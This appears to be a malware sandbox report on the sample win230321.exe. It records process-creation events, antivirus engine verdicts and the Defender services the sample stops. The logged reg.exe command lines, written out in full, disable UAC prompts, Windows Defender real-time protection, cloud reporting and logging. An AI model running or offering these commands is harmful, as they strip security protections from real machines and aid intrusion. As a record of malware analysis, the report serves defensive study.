CreateProcessInternalW March 28, 2021, 12:10 p.m.	thread_identifier: 4772 thread_handle: 0x00000084 process_identifier: 3916 current_directory: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t "REG_DWORD" /d 0 /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW March 28, 2021, 12:10 p.m.	thread_identifier: 6596 thread_handle: 0x00000088 process_identifier: 2060 current_directory: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW March 28, 2021, 12:10 p.m.	thread_identifier: 4012 thread_handle: 0x00000084 process_identifier: 1036 current_directory: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW March 28, 2021, 12:10 p.m.	thread_identifier: 4376 thread_handle: 0x00000088 process_identifier: 3176 current_directory: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW March 28, 2021, 12:10 p.m.	thread_identifier: 3980 thread_handle: 0x00000084 process_identifier: 3456 current_directory: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW March 28, 2021, 12:10 p.m.	thread_identifier: 7908 thread_handle: 0x00000088 process_identifier: 5352 current_directory: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW March 28, 2021, 12:10 p.m.	thread_identifier: 5596 thread_handle: 0x00000084 process_identifier: 4900 current_directory: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW March 28, 2021, 12:10 p.m.	thread_identifier: 2728 thread_handle: 0x00000088 process_identifier: 3064 current_directory: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW March 28, 2021, 12:10 p.m.	thread_identifier: 4168 thread_handle: 0x00000084 process_identifier: 7804 current_directory: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW March 28, 2021, 12:10 p.m.	thread_identifier: 2428 thread_handle: 0x00000088 process_identifier: 7608 current_directory: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW March 28, 2021, 12:10 p.m.	thread_identifier: 8888 thread_handle: 0x00000084 process_identifier: 4804 current_directory: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW March 28, 2021, 12:10 p.m.	thread_identifier: 2832 thread_handle: 0x00000088 process_identifier: 2460 current_directory: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW March 28, 2021, 12:10 p.m.	thread_identifier: 7808 thread_handle: 0x00000084 process_identifier: 1596 current_directory: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW March 28, 2021, 12:10 p.m.	thread_identifier: 6960 thread_handle: 0x00000088 process_identifier: 2408 current_directory: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW March 28, 2021, 12:10 p.m.	thread_identifier: 7128 thread_handle: 0x00000084 process_identifier: 3780 current_directory: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW March 28, 2021, 12:10 p.m.	thread_identifier: 7824 thread_handle: 0x00000088 process_identifier: 7280 current_directory: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1

File has been identified by 33 AntiVirus engines on VirusTotal as malicious (33 events)

MicroWorld-eScan	Trojan.GenericKD.45966732
Qihoo-360	Win32/Trojan.Kryptik.HwMAI0MA
ALYac	Trojan.GenericKD.45966732
Cylance	Unsafe
Sangfor	Trojan.Win32.Wacatac.B
CrowdStrike	win/malicious_confidence_80% (W)
BitDefender	Trojan.GenericKD.45966732
K7GW	Trojan ( 0057999f1 )
K7AntiVirus	Trojan ( 0057999f1 )
Cyren	W32/MSIL_Kryptik.DRZ.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/Kryptik.AADL
APEX	Malicious
Kaspersky	HEUR:Trojan-Spy.MSIL.SpyEyes.gen
AegisLab	Trojan.Multi.Generic.4!c
Ad-Aware	Trojan.GenericKD.45966732
Sophos	ML/PE-A
DrWeb	Trojan.Siggen12.56637
McAfee-GW-Edition	BehavesLike.Win32.Generic.ch
FireEye	Trojan.GenericKD.45966732
Emsisoft	Trojan.GenericKD.45966732 (B)
SentinelOne	Static AI - Suspicious PE
MAX	malware (ai score=88)
Arcabit	Trojan.Generic.D2BD658C
GData	Trojan.GenericKD.45966732
Cynet	Malicious (score: 100)
McAfee	Artemis!66C3AE9BDDBB
Rising	Trojan.Kryptik!8.8 (CLOUD)
Ikarus	Trojan.MSIL.Crypt
Fortinet	MSIL/Kryptik.ZXL!tr
BitDefenderTheta	Gen:NN.ZemsilF.34628.2m0@a0Eussb
AVG	Win32:RATX-gen [Trj]
Avast	Win32:RATX-gen [Trj]

Stops Windows services (5 events)

service	WdNisDrv (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start)
service	WdBoot (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start)
service	WdNisSvc (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start)
service	WdFilter (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start)
service	WinDefend (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start)

win230321.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All